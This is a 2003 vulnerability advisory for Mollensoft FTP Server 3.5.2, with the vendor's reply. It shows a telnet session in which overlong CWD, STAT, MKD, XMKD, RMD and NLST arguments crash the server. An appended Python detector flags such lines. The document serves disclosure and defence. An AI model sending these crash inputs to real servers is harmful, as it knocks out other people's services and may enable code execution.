Mollensoft FTP Server 3.5.2 (or Hyperion FTP server)

Release Date:
June 4, 2003

Severity:
High (remote crash - code execution)


Systems Affected: 
Mollensoft FTP Server 3.5.2 (possibly all older versions)


Here is the email I got from the company when I informed them about the holes:
----------------------------------------------------------------------------------
From services@mollensoft.com Wed Jun 4 18:33:50 2003
From: "Services" <services@mollensoft.com>
To: XXXX XXXXX <dr_insane@pathfinder.gr>
Subject: RE: Mollensoft FTP Server 3.5.2 ( or Hyperion ftp server) SECURITY ADVISORY
Date: Wed, 4 Jun 2003 05:30:34 -0700

Howdy,
Thank you very much. I am working on a fix,
should be out soon.  Thanks for your help.

V/R,
BIGAL
bigal@mollensoft.com

-----Original Message-----
From: xxxxx xxxxxx [mailto:dr_insane@pathfinder.gr]
Sent: Wednesday, June 04, 2003 8:26 AM
To: support@mollensoft.com
Subject: Mollensoft FTP Server 3.5.2 ( or Hyperion ftp server) SECURITY
ADVISORY


Hello,

Yesterday I downloaded Mollensoft FTP Server 3.5.2. While I was checking it
I found some serious buffer overflows in the cwd, mkd, rmd, stat, nlst commands.
I am sending you an advisory in order to fix the problems.

I hope you will respond!

---------------------------------------------------------------------------

Description:
Many buffer overflows were discovered while I was checking the latest version of Hyperion FTP server. Any user
can exploit these vulnerabilities to crash the server remotely or to execute arbitrary code (an exploit will
be released for this). Various structures can be overwritten in the process heap to gain control of the remote
FTP server with administrator privileges.


Let's r0ck (or exploit code)
----------------------------
The following examples will show the vulnerable conditions.


C:\>telnet localhost 21
220 Mollensoft FTP Server 3.5.2 Ready.
user anonymous
331 Password required for anonymous.
pass ins@qwerty.gr
230 User anonymous logged in.

CWD 344 * A

overflow..crash...

Stat 340 * A

overflow..crash...

mkd 270 * A

overflow..crash...

xmkd 270 * A

overflow..crash...

rmd 270 * A

overflow..crash...

nlst 340 * A

overflow..crash...

Supplying any one of the commands above crashes the FTP server :>
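
A defensive check built from the session above, added here as an example and not part of the original advisory: it flags FTP control-channel lines whose argument to one of the listed commands is over-long. The 255-byte limit, the function names and the sample lines are assumptions made for illustration.

```python
# Commands the advisory lists as overflowing, with the argument length shown
# in its telnet session (e.g. "CWD 344 * A" means CWD followed by 344 'A's).
DEMONSTRATED = {"CWD": 344, "STAT": 340, "NLST": 340,
                "MKD": 270, "XMKD": 270, "RMD": 270}

# Assumption: alert well below the shortest demonstrated length, because the
# advisory does not state the exact size of the overflowed buffers.
MAX_ARG_LEN = 255

def check_line(raw: bytes):
    """Return an alert dict for one client-to-server FTP line, or None."""
    parts = raw.strip().split(None, 1)          # verb, then the rest as one argument
    if not parts:
        return None
    verb = parts[0].decode("ascii", "replace").upper()  # verbs are case-insensitive
    arg = parts[1] if len(parts) > 1 else b""
    if verb not in DEMONSTRATED or len(arg) <= MAX_ARG_LEN:
        return None
    # A long run of one repeated byte is typical of crash-test padding.
    top = max(arg.count(bytes([b])) for b in set(arg))
    return {"verb": verb,
            "arg_len": len(arg),
            "reaches_demonstrated_len": len(arg) >= DEMONSTRATED[verb],
            "single_byte_ratio": round(top / len(arg), 2)}

def scan(lines):
    """Return [(line_number, alert), ...] for every suspicious line."""
    hits = []
    for n, raw in enumerate(lines, 1):
        alert = check_line(raw)
        if alert:
            hits.append((n, alert))
    return hits

# Constructed sample of control-channel lines, not a real capture.
SAMPLE = [
    b"USER anonymous\r\n",
    b"PASS guest@example.org\r\n",
    b"CWD /pub/incoming\r\n",
    b"cwd " + b"A" * 344 + b"\r\n",
    b"Stat " + b"A" * 340 + b"\r\n",
    b"xmkd " + b"B" * 260 + b"\r\n",     # below the demonstrated 270, still flagged
    b"RETR " + b"C" * 400 + b"\r\n",     # long, but not a command the advisory lists
]

if __name__ == "__main__":
    for n, alert in scan(SAMPLE):
        print(n, alert)
```

The same length check can sit in a proxy or IDS rule in front of the server until a fixed version is installed.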


Credit:
Dr_insane


Feedback:
Please send comments to:

dr_insane@pathfinder.gr
http://members.lycos.co.uk/r34ct/